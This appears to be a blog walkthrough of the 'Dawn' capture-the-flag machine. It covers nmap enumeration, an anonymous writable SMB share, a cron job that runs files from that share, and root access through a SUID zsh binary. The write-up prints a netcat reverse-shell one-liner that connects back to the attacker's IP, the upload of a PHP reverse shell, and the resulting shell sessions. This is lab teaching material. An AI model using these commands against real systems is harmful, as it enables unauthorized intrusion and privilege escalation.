pg-dawn-play

Dawn

Nmap
sudo nmap 192.168.55.11 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWN

On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.

kali@kali:~/dawn$ smbclient -U ” -L \\\\192.168.55.11\\
Enter WORKGROUP\’s password:

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled — no workgroup available
kali@kali:~/dawn$

Connecting then directly to the ITDEPT share.

kali@kali:~/dawn$ smbclient -U ” \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020

7158264 blocks of size 1024. 3518364 blocks available
smb: \>

I then used curl to test for file upload on the share and confirmed was able to upload a PHP reverse shell which might come in handy for later.
kali@kali:~/dawn$ curl –upload-file rev.php -u ” smb://192.168.55.11/ITDEPT//rev.php
Enter host password for user ”:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5496 0 0 100 5496 0 536k –:–:– –:–:– –:–:– 596k
kali@kali:~/dawn$
Running dirsearch.py on port 80 reveals two interesting directories.
python3 dirsearch.py -u http://192.168.152.11 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 –full-url

Moving into logs shows the a list of logs where management.log is the only one we have permission to access

When reading the log file we have the lines below appearing frequently.

2020/08/12 09:25:0 CMD: UID=33 PID=1360 | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359 | /bin/sh -c /home/dawn/ITDEPT/product-control

Knowing that we have write access to the ITDEPT share we can upload a reverse shell call it web-control and in theory this should execute.

Firstly I created a file called web-control and inserted a netcat reverse shell into it

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.200 9001 >/tmp/f

This was then uploaded to the SMB share.

smb: \> put web-control 
putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s)
smb: \> ls
. D 0 Thu Sep 2 09:34:20 2021
.. D 0 Wed Jul 22 13:19:41 2020
rev.php A 5496 Thu Sep 2 09:13:41 2021
web-control A 83 Thu Sep 2 09:38:54 2021

7158264 blocks of size 1024. 3518292 blocks available
smb: \>

After doing so I soon receive a shell back on my netcat listener.

kali@kali:~/dawn$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
Next I search for SUID and found a binary zsh as having the SUID bit set.
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
As zsh is a shell binary all we need to do is execute the full path of zsh to gain a root shell.
www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# id 
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# cd /root 
cd /root
dawn# ls 
ls
flag.txt proof.txt
dawn# cat flag.txt 
cat flag.txt
Your flag is in another file...
dawn# cat proof.txt 
cat proof.txt
04bf91ebc2de37fbee66338c45a80b95
dawn#
.
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *